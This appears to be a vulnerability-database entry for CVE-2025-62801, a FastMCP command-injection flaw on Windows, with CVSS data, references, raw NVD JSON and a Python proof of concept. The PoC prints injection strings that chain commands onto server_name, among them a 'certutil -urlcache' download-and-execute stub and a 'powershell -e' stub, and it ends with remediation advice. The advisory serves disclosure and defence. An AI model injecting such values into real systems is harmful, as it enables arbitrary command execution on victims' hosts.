CVE-2025-62801

Description

FastMCP is the standard framework for building MCP applications. Versions prior to 2.13.0, a command-injection vulnerability lets any attacker who can influence the server_name field of an MCP execute arbitrary OS commands on Windows hosts that run fastmcp install cursor. This vulnerability is fixed in 2.13.0.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jlowin:fastmcp:*:*:*:*:*:*:*:* - VULNERABLE

FastMCP < 2.13.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62801 PoC - FastMCP Command Injection
# This PoC demonstrates the command injection vulnerability in FastMCP < 2.13.0
# Target: Windows hosts running fastmcp install cursor
# Note: This PoC is for educational and security research purposes only

import subprocess
import sys

def generate_malicious_server_name():
    """
    Generate a malicious server_name payload for command injection.
    The payload exploits the lack of input sanitization in FastMCP's server_name parameter.
    On Windows, the '&' operator chains commands, allowing arbitrary command execution.
    """
    # Payload that executes calc.exe after the legitimate command
    # In real attacks, this would be replaced with more harmful commands
    malicious_commands = [
        "calc",                     # Launch calculator (proof of concept)
        "whoami > C:\\temp\\pwned.txt",  # Write current user to file
        "powershell -e ...",        # Execute PowerShell payload
        "certutil -urlcache -f ...", # Download and execute malware
    ]
    
    # Construct the malicious server_name
    # The legitimate part is followed by command chaining operators
    base_name = "legitimate-server"
    
    payloads = []
    for cmd in malicious_commands:
        payload = f"{base_name}&{cmd}"
        payloads.append(payload)
    
    return payloads

def demonstrate_vulnerability():
    """
    Demonstrate the vulnerability by showing how malicious server_name
    would be processed by the vulnerable FastMCP installation process.
    """
    print("=" * 60)
    print("CVE-2025-62801 FastMCP Command Injection PoC")
    print("=" * 60)
    print("\n[!] This vulnerability affects FastMCP < 2.13.0 on Windows")
    print("[!] When running: fastmcp install cursor\n")
    
    payloads = generate_malicious_server_name()
    
    print("Malicious server_name payloads:")
    print("-" * 40)
    for i, payload in enumerate(payloads, 1):
        print(f"{i}. {payload}")
    
    print("\n" + "-" * 40)
    print("Attack Scenario:")
    print("-" * 40)
    print("""
1. Attacker gains ability to influence server_name parameter
2. Attacker injects malicious command using '&' operator
3. During 'fastmcp install cursor', the payload is executed
4. Arbitrary OS commands run with the privileges of the fastmcp process
5. Attacker achieves code execution, privilege escalation, or data exfiltration
    """)
    
    print("\n" + "-" * 40)
    print("Example vulnerable code pattern:")
    print("-" * 40)
    print("""
# Vulnerable code (FastMCP < 2.13.0):
import subprocess

def install_cursor(server_name):
    # VULNERABLE: Direct string concatenation without sanitization
    cmd = f"fastmcp install cursor --name {server_name}"
    subprocess.run(cmd, shell=True)  # Dangerous: shell=True with unsanitized input
    
# Attacker's input:
# server_name = "test&calc"
# Resulting command: fastmcp install cursor --name test&calc
# This executes both the legitimate command AND the injected 'calc' command
    """)
    
    print("\n" + "-" * 40)
    print("Remediation:")
    print("-" * 40)
    print("Upgrade to FastMCP >= 2.13.0")
    print("Implement input validation and sanitization")
    print("Use subprocess with shell=False when possible")
    print("Avoid direct string concatenation in command construction")
    print("=" * 60)

if __name__ == "__main__":
    demonstrate_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62801
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62801
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62801/
[4] VulDB https://vuldb.com/cve/CVE-2025-62801
[5] https://github.com/jlowin/fastmcp/security/advisories/GHSA-rj5c-58rq-j5g5
[6] https://github.com/jlowin/fastmcp/security/advisories/GHSA-rj5c-58rq-j5g5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62801", "sourceIdentifier": "[email protected]", "published": "2025-10-28T22:15:37.950", "lastModified": "2025-11-04T13:24:32.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastMCP is the standard framework for building MCP applications. Versions prior to 2.13.0, a command-injection vulnerability lets any attacker who can influence the server_name field of an MCP execute arbitrary OS commands on Windows hosts that run fastmcp install cursor. This vulnerability is fixed in 2.13.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jlowin:fastmcp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.13.0", "matchCriteriaId": "938DF638-7486-4DDB-A950-1A16D8FCCEA1"}]}]}], "references": [{"url": "https://github.com/jlowin/fastmcp/security/advisories/GHSA-rj5c-58rq-j5g5", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/jlowin/fastmcp/security/advisories/GHSA-rj5c-58rq-j5g5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}